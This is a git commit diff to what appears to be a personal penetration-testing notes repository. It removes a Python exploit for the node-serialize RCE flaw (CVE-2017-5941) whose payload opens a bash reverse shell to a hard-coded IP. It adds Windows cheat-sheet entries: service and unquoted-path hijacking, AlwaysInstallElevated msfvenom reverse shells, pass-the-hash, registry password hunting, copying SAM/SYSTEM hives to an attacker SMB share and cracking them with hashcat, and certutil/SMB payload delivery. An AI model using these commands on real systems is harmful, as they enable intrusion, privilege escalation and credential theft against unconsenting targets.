bump

49552.py

@@ -1,47 +0,0 @@
-# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
-# Exploit Author: UndeadLarva
-# Software Link: https://www.npmjs.com/package/node-serialize
-# Version: 0.0.4
-# CVE: CVE-2017-5941
-
-import requests
-import re
-import base64
-import sys
-
-url = 'http://10.10.216.3/' # change this
-
-payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
-"return function () {"
-"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
-"console.log('still inside');"
-"const { exec } = require('child_process');"
-"exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1');" # change this
-"}"
-"})(require('http').ServerResponse.prototype.end)")
-
-# rce = "_$$ND_FUNC$$_process.exit(0)"
-#code ="_$$ND_FUNC$$_console.log('behind you')"
-#code  = "_$$ND_FUNC$$_" + "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });}"
-#code = "_$$ND_FUNC$$_" + payload
-
-code = "_$$ND_FUNC$$_console.log(1)()"
-#code = "_$$ND_FUNC$$_require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });()"
-#string = '{"username":"TheUndead","country":"worldwide","city":"Tyr", "exec": "'+code+'"}'
-#code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}();" # change this
-code = "return function(){exec('bash -i >& /dev/tcp/10.9.7.193/4448 0>&1')}()&#x3b;"
-string = '{"email": "'+code+'"}'
-
-print code 
-
-cookie = {'session':base64.b64encode(string)}
-
-response = requests.post(url+"?email="+code).text
-print response
-
-#try:
-#    response = requests.get(url, cookies=cookie).text
-#    print response
-#except requests.exceptions.RequestException as e:
-#    print('Oops!')
-#    sys.exit(1)

enumeration/windows/sysinternals.md

@@ -89,9 +89,28 @@ regjump HKLM
 ```
 reg query HKLM
 ```
+```
 Get-Item
 Get-ItemProperty
 ```
 
 ## Strings
 Strings just scans the file you pass it for UNICODE (or ASCII) strings of a default length of 3 or more UNICODE (or ASCII) characters.
+
+## Create a system authority shell 
+1. Check permissons
+```sh
+accesschk.exe /accepteula -uwcqv user <serviceName>
+```
+2. Query service
+```sh
+sq qc <service>
+```
+3. Set service config to the msfvenom reverse shell, uploaded previously.
+```
+sc config daclsvc binpath= "\"C:\shell.exe""
+```
+4. Start service and gain high priv shell
+```sh
+net start daclsvc
+```

exploit/windows/docs/always_installed_elevated.md

@@ -0,0 +1,17 @@
+# AlwaysInstalledElevated
+
+* Watch out for `AlwaysInstalledElevated` keys inside the registry via
+```sh
+reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+```
+* Prepare reverse shell on attacker as an msi file
+```
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Port> -f msi -o shell.msi
+```
+* start the msi on target
+```sh
+msiexec /quiet /qn /i C:\shell.msi
+```
+
+

exploit/windows/docs/pass_the_hash.md

@@ -0,0 +1,7 @@
+# Pass the Hash
+
+* Authenticate with retrieved hash
+* User evil-winrm or
+```
+pth-winexe -U 'admin%hash' //<target-IP> cmd.exe
+```

exploit/windows/docs/password_in_registry.md

@@ -0,0 +1,25 @@
+# Password Inside Registry Key
+
+* Query passwords saved inside the registry
+```sh
+reg query HKLM /f password /t REG_SZ /s
+```
+* Admin Autologon credentials
+```
+reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
+```
+* On attacker, change the credentials on target
+```sh
+winexe -U 'admin%password' //<target-IP> cmd.exe
+```
+
+## List other Creds
+```
+cmdkey /list
+```
+* Open reverse shell
+```sh
+runas /savecred /user:admin C:\shell.exe
+```
+
+

exploit/windows/docs/potatoes.md

@@ -0,0 +1,7 @@
+# Potatoes
+
+* [Hot Potato](https://foxglovesecurity.com/2016/01/16/hot-potato/)
+* [Rotten Potato](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
+* [Lonely Potato](https://decoder.cloud/2017/12/23/the-lonely-potato/)
+* [Juicy Potato](https://ohpe.it/juicy-potato/)
+* [Rogue Potato](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)

exploit/windows/docs/unquoted_path.md

@@ -0,0 +1,13 @@
+# Unquoted Path
+
+* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
+* Some part of path has to be writeable.
+## Example
+* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
+```sh
+copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
+```
+```sh
+net start <service>
+```
+

post_exploitation/docs/powershell.md

@@ -6,3 +6,19 @@ save HKLM\SAM C:\Users\Administrator\Desktop\SAM
 save HKLM\SAM C:\Users\Administrator\Desktop\System
 ```
 * Use `samdump2`
+
+## Extract Hashes
+* Extract via smb server on attacker
+```
+copy C:\Windows\Repair\SAM \\<attacker-IP>\dir\
+copy C:\Windows\Repair\SYSTEM \\<attacker-IP>\dir\
+```
+* Crack via [creddump7](git clone https://github.com/Tib3rius/creddump7)
+```
+python pwdump.py SYSTEM SAM
+```
+or
+```
+hashcat -m 1000 --force <hash> /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
+```
+

reverse_shells/docs/msfvenom.md

@@ -20,7 +20,7 @@ msfvenom -p <payload> <options>
 ## Windows
 ### x64 Reverse Shell in exe format
 ```
-msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
+msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>
 ```
 
 ### x86 shikata_ga_nai
@@ -51,6 +51,15 @@ or on cmd.exe
 ```sh
 certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port>/shell.exe
 ```
+* Using SMB
+On attacker
+```sh
+sudo python impacket/examples/smbserver.py dir .
+```
+on target
+```sh
+copy \\<attacker-IP>\dir\shell.exe C:\shell.exe
+```
 
 ## Unix
 ### netcat reverse